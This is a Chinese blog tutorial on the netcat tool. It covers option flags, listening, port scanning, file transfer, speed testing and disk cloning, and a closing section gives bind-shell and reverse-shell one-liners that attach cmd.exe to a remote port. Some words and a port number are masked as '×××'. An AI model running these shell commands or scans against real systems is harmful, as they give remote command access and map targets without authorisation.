支持IPV6的瑞士×××之nc命令------强大的网络命令工具

nc工具使用

功能说明:

功能强大的网络工具,在网络工具中有“瑞士×××”美誉,其有Windows和Linux的版本。因为它短小精悍,功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接。


nc的作用:

(1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口

(2)端口的扫描,nc可以作为client发起TCP或UDP连接

(3)传输文件

(4)网络测速

(5)克隆硬盘或分区

(6)反弹服务器shell


nc的常用的几个参数如下所列:

1)-4      

强制nc只能使用IPv4地址。

2)-6      

强制nc只能使用IPv6地址。

3) -l

用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。

4) -p <port>

暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数)

5) -s

指定发送数据的源IP地址,适用于多网卡机

6) -u

 指定nc使用UDP协议,默认为TCP

7) -v

输出交互或出错信息,新手调试时尤为有用

8)-w

超时秒数,后面跟数字

9)-z

表示zero,表示扫描时不发送任何数据

10)  -D      

在socket上开启debugging功能

11) -d      

不从标准输入中读取任何消息

12) -h      

帮助选项

13)-i  interval      

在文本行之间的发送或接受,指定一个延迟时间间隔。 也会产生多个端口间的连接有延迟时间。

14) -k      

强制nc保持监听其他连接,在它当前的连接完成之后。 如果不和-l选项一起使用,会有错误。

15) -n      

不使用DNS或者服务不做任何地址,主机名或者端口的查询

16) -r      

指定源 和/或 目的端口是随机选择的,而不是系统按照一个范围或者顺序分配的。

17) -S     

开启RFC 2385 TCP MD5签名选项。

18) -T ToS  

为连接指定IP的服务类型(ToS)。有效的值是令牌“lowdelay”, “throughput”, “reliability”, 或者以“0x”开头的8位的十六进制值。

19) -C      

发送CRLF做为行尾符

20) -t      

让nc发送RFC 854 不要和将不要响应RFC 854要或者将要的请求。这使得nc可以脚本化telnet会话过程。

21) -U      

使用Unix Domain Sockets

22) -X proxy_version       

与代理服务器交互时的请求,nc必须使用指定的协议。支持的协议是“4” (SOCKS v.4), “5” (SOCKS v.5)和“connect” (HTTPS proxy)。 如果协议不指定,SOCKS版本5将被使用。

23) -x proxy_address[:port]       

请求时,nc必须连接一个使用代理地址和端口的代理做为主机名。如果端口没有被指定,那么众所周知的端口将为代理协议所使用(1080 for SOCKS, 3128 for HTTPS)

主机名可以是IP地址或者字符的主机名(除非使用了-n选项)。通常一个主机名必须被指定的(没有指定主机名的都会使用localhost),除非使用了-l选项

端口可以是单独一个整数或者一个范围。 范围是nn-mm这种格式。通常一个目的端口必须被指定,除非使用了-U选项(这种情况下是指定了socket了)


nc的用法介绍

IPV6的使用举例:

udp

企业微信截图_15439223234558.png

企业微信截图_15439223352054.png

后边的%eth0必须加,不然数据无法得知出去的网卡线路

tcp

微信截图_20181205110040.png

微信截图_20181205110053.png

IPV4的使用举例:


tcp监听

nc可以作为server端启动一个tcp的监听,默认情况下下面监听的是一个tcp的端口

nc -l -p 9999

 

客户端测试

1、在B机器上telnet A机器此端口,如下显示表示B机器可以访问A机器此端口

telnet 10.0.1.161 9999

2、B机器上也可以使用nmap扫描A机器的此端口

nmap 10.0.1.161 -p9999

3、使用nc命令作为客户端工具进行端口探测

nc -vz -w 2 10.0.1.161 9999

(-v可视化,-z扫描时不发送数据,-w超时几秒,后面跟数字)

服务端会自动关闭监听。

4、nc可以扫描连续端口,这个作用非常重要。常常可以用来扫描服务器端口,然后给服务器安全加固

在客户端B机器上扫描连续的两个端口,如下

nc -vzw 2 10.0.1.161 9998-9999

 

udp监听

nc作为server端启动一个udp的监听(注意,此处重点是起udp,上面主要讲了tcp)

启动一个udp的端口监听

nc -ul -p 9998

 

复制当前窗口输入 netstat -antup |grep 9998 可以看到是启动了udp的监听

 

测试方法

1、 

nc -vuz 10.0.1.161 9998

(u表示udp端口,v表示可视化输出,z表示扫描时不发送数据)

由于udp的端口无法在客户端使用telnet去测试,我们可以使用nc命令去扫描。

(telnet是运行于tcp协议的)

上面在B机器扫描此端口的时候,看到A机器下面出现一串XXXXX字符串(我测试时出现两个a)

2、

nmap -sU 10.0.1.161 -p 9998

-sU :表示udp端口的扫描

注意:如果A机器开启了防火墙,扫描结果可能会是下面状态。(不能确定对方是否有监听9998端口)

nmap -sU 10.0.1.161 -p 9998 -Pn

既然上面测试无法使用nmap扫描nc作为服务端启动的端口,我们可以使用nmap扫描其余的端口

(额,有点跑题了,讲nmap的用法了,没关系,主要为了说明nmap是也可以用来扫描udp端口的,只是扫描nc启动的端口会导致对方退出端口监听)

下面,A机器上rpcbind服务,监听在udp的111端口

netstat -anup | grep 111

 

在B机器上使用nmap扫描此端口,是正常的检测到处于open状态

 

udp端口扫描

扫描过程比较慢,可能是1秒扫描一个端口,下面表示扫描A机器的1到1000端口(暂未发现可以在一行命令中扫描分散的几个端口的方法)

nc -vuz 10.0.1.161 1-1000

 

 

用法2、 使用nc传输文件和目录

 

方法1,先启动接收命令

使用nc传输文件还是比较方便的,因为不用scp和rsync那种输入密码的操作了

把A机器上的一个rpm文件发送到B机器上

需注意操作次序,receiver先侦听端口,sender向receiver所在机器的该端口发送数据。 

 

步骤1,先在B机器上启动一个接收文件的监听,格式如下

意思是把赖在9995端口接收到的数据都写到file文件里(这里文件名随意取)

格式:nc -l port >file

nc -l -p 9995 >zabbix.rpm

步骤2,在A机器上往B机器的9995端口发送数据,把下面rpm包发送过去

nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm

方法2,先启动发送命令

步骤1,先在B机器上,启动发送文件命令

下面命令表示通过本地的×××端口发送test.mv文件

nc -l -p ××× <test.mv

步骤2,A机器上连接B机器,取接收文件

下面命令表示通过连接B机器的×××端口接收文件,并把文件存到本目录下,文件名为test2.mv

nc 10.0.1.162 ××× >test2.mv

 

方法3,传输目录演示(方法发送文件类似)

 

步骤1,B机器先启动监听,如下

A机器给B机器发送多个文件

传输目录需要结合其它的命令,比如tar

经过我的测试管道后面最后必须是 - ,不能是其余自定义的文件名

nc -l -p 9995 | tar xzvf -

 

步骤2,A机器打包文件并连接B机器的端口

管道前面表示把当前目录的所有文件打包为 - ,然后使用nc发送给B机器

tar cfz - * | nc 10.0.1.162 9995或者 tar czvf – nginx-0.6.34|nc 192.168.228.222 1234

B机器这边已经自动接收和解压

 

方法4,拼接命令传输

 

使用nc进行文件传输,命令

ssh [email protected] “( nc -l 10003 > destination 2>/dev/null & )” && cat source | nc www.freetstar.com 10003

&& 前边ssh登录到远程主机www.freetstar.com上,用nc命令打开本地的10003端口,成为后台进程

&&后边,在本地机器上打开source文件,并将其重定向到www.freetstar.com的10003号端口,也就是让远程www.freetstar.com主机10003号端口接收source文件

 

 

 

用法3、 测试网速

测试网速其实利用了传输文件的原理,就是把来自一台机器的/dev/zero 发送给另一台机器的/dev/null

就是把一台机器的无限个0,传输给另一个机器的空设备上,然后新开一个窗口使用dstat命令监测网速

在这之前需要保证机器先安装dstat工具

yum install -y dstat

 

方法1,测试网速演示(先启动接收命令方式)

步骤1,A机器先启动接收数据的命令,监听自己的9991端口,把来自这个端口的数据都输出给空设备(这样不写磁盘,测试网速更准确)

nc -l 9991 >/dev/null

步骤2,B机器发送数据,把无限个0发送给A机器的9991端口

nc 10.0.1.161 9991 </dev/zero

在复制的窗口上使用dstat命令查看当前网速,dstat命令比较直观,它可以查看当前cpu,磁盘,网络,内存页和系统的一些当前状态指标。

我们只需要看下面我选中的这2列即可,recv是receive的缩写,表示接收的意思,send是发送数据,另外注意数字后面的单位B,KB,MB

 

方法2,测试网速演示(先启动发送命令方式)

步骤1,先启动发送的数据,谁连接这个端口时就会接收来自zero设备的数据(二进制的无限个0)

nc -l 9990 </dev/zero

步骤2,下面B机器连接A机器的9990端口,把接收的数据输出到空设备上

nc 10.0.1.161 9990 >/dev/null

同样可以使用dstat观察数据发送时的网速

 

 

用法4、 克隆硬盘或分区

 

操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。

克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:

# nc -l -p 1234 | dd of=/dev/sda

server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:

# dd if=/dev/sda | nc 192.168.228.222 1234

※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

 

用法5、 反弹服务器shell

 

方法1、REMOTE主机绑定SHELL

在公网监听

nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
或者
nc -l -p 5555 -t -e cmd.exe

在内网主动建立连接

nc -nvv 192.168.153.138 5555

-t是通过telne模式执行 cmd.exe 程序,可以省略。

讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

 

 

方法2、REMOTE主机绑定SHELL并反向连接

在公网监听

nc -lp 5555

在内网机器反弹

nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354或者
nc -t -e cmd 192.168.153.140 5555

讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多,

当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。





發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章